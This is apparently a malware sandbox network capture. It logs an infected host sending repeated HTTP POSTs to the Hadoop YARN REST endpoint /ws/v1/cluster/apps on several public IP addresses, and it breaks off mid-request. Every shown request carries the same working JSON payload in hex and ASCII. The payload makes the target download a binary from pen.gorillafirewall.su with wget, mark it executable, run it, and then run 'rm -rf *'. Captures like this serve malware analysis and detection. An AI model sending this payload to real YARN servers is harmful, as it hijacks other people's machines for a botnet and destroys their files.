                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:21.857918024 CEST359OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 94.201.90.86:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:22.817842007 CEST359OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 94.201.90.86:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                31192.168.2.234247831.240.32.1168088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:39:23.899571896 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 31.240.32.116:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:24.141633987 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 31.240.32.116:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:24.385574102 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 31.240.32.116:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:24.897512913 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 31.240.32.116:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:25.889390945 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 31.240.32.116:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:27.841167927 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 31.240.32.116:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:31.872603893 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 31.240.32.116:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                32192.168.2.235339622.172.178.768088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:39:32.909390926 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 22.172.178.76:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:33.148457050 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 22.172.178.76:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:33.388477087 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 22.172.178.76:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:33.888374090 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 22.172.178.76:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                33192.168.2.235065849.179.51.1638088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:39:35.911643028 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 49.179.51.163:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                34192.168.2.2360474219.253.93.1238088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:39:44.919136047 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 219.253.93.123:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:45.166800022 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 219.253.93.123:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:45.414783955 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 219.253.93.123:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:45.922692060 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 219.253.93.123:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
